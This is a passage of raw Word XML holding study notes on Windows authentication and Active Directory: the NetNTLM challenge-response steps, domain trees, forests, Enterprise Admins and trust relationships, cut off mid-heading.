    <w:p w14:paraId="5395CA63" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>NetNTLM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="000D0BDC">
        <w:t xml:space="preserve">Windows New Technology LAN Manager (NTLM) is a suite of security protocols offered by Microsoft to authenticate users’ identity and protect the integrity and confidentiality of their activity. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0319A5" w14:textId="57185C2F" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>works using a challenge-response mechanism.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9FEC8" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B44D5B" w14:textId="00A6FF0D" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:ind w:left="2160" w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Domain Account Authentication Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DAAA57" w14:textId="61C40031" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37484A71" wp14:editId="583D9463">
            <wp:extent cx="5943600" cy="3092450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1952922969"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2969" name="Picture 4" descr="A diagram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inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534F5BB" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6656294C" w14:textId="17E3AFDD" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544A48C7" w14:textId="70177D8A" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The client sends an authentication request to the server they want to access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D6D22F" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The server generates a random number and sends it as a challenge to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4A3164" w14:textId="1F67207A" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The client combines their </w:t>
      </w:r>
      <w:r w:rsidRPr="00B17A5C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>NTLM password hash with the challenge</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (and other known data) to generate a response to the challenge and sends it back to the server for verification</w:t>
      </w:r>
      <w:r w:rsidR="005A525B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (simply </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="005A525B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="005A525B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> encrypt the challenge with its password hash)</w:t>
      </w:r>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1555746A" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The server forwards the challenge and the response to the Domain Controller for verification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5FCAFF" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The domain controller uses the challenge to recalculate the response and compares it to the original response sent by the client. If they both match, the client is authenticated; otherwise, access is denied. The authentication result is sent back to the server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FB4CDD" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRPr="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="num" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>The server forwards the authentication result to the client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24504872" w14:textId="72F0DED5" w:rsidR="004B0727" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Note that the user's password (or hash) is never transmitted through the network for security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918E15C" w14:textId="6D0F8511" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: The </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>described process</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="000D0BDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> applies when using a domain account. If a local account is used, the server can verify the response to the challenge itself without requiring interaction with the domain controller since it has the password hash stored locally on its SAM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2DD49D" w14:textId="77777777" w:rsidR="000D0BDC" w:rsidRDefault="000D0BDC" w:rsidP="000D0BDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A7FDE2F" w14:textId="3E56579B" w:rsidR="00DC359E" w:rsidRDefault="00DC359E" w:rsidP="000D0BDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="00B050"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04C93939" w14:textId="7A9428F0" w:rsidR="00BD7B2B" w:rsidRPr="00DC359E" w:rsidRDefault="00DC359E" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Tree</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>integrating multiple domains</w:t>
      </w:r>
      <w:r w:rsidR="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00BD7B2B" w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>group of Windows domains that share the same namespace</w:t>
      </w:r>
      <w:r w:rsidR="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB31BFE" w14:textId="19A81469" w:rsidR="00DC359E" w:rsidRPr="00DC359E" w:rsidRDefault="00DC359E" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Each domain </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>separated</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> and each </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Domain Administrators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> will have the full control over their domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7653CBC4" w14:textId="57DC3356" w:rsidR="00DC359E" w:rsidRDefault="00DC359E" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enterprise Admins </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">group </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:t xml:space="preserve">will grant </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC359E">
        <w:t>a user</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC359E">
        <w:t xml:space="preserve"> administrative privileges over </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC359E">
        <w:t>all of</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC359E">
        <w:t xml:space="preserve"> an enterprise's domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD78D3D" w14:textId="376DC2FD" w:rsidR="00DC359E" w:rsidRDefault="00DC359E" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve">Each domain would still have its Domain Admins with administrator privileges over their single domains and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
        </w:rPr>
        <w:t>the Enterprise</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
        </w:rPr>
        <w:t xml:space="preserve"> Admins who can control everything in the enterprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9222F" w14:textId="4EE8A9EE" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0840EC" w14:textId="77777777" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="660B83AB" w14:textId="0A0B462E" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F8DAFCE" wp14:editId="499E1FB1">
            <wp:extent cx="2600325" cy="2004060"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="56776321" name="Picture 8" descr="A triangle with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321" name="Picture 8" descr="A triangle with icons and text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId11">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="7042" r="16057"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2600551" cy="2004234"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6D90153F" wp14:editId="05F62EF3">
            <wp:extent cx="4848225" cy="3763645"/>
            <wp:effectExtent l="0" t="0" r="9525" b="8255"/>
            <wp:docPr id="125014740"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740" name="Picture 9" descr="A diagram of a company&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId12">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="2083" r="16346"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4848225" cy="3763645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC06DC" w14:textId="77777777" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00DC359E">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:color w:val="275317" w:themeColor="accent6" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11CA950E" w14:textId="331BEB19" w:rsidR="00DC359E" w:rsidRDefault="00DC359E" w:rsidP="00DC359E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Forests</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00DC359E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>different domain trees</w:t>
      </w:r>
      <w:r w:rsidR="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8E154A" w14:textId="5F494172" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00DC359E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1860A907" wp14:editId="481AC5E8">
            <wp:extent cx="5943600" cy="2237740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1472040486" name="Picture 7" descr="A diagram of a fores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40486" name="Picture 7" descr="A diagram of a forest and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7740"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DE8E27" w14:textId="77777777" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00DC359E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="652F5D54" w14:textId="46D5740E" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Trust relationships</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">: to enable users in domain to access another domain in the forest even if there are in different </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tree</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> or in different domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA78E1E" w14:textId="549322D5" w:rsidR="00BD7B2B" w:rsidRDefault="00BD7B2B" w:rsidP="00BD7B2B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD7B2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>one-way trust relationship</w:t>
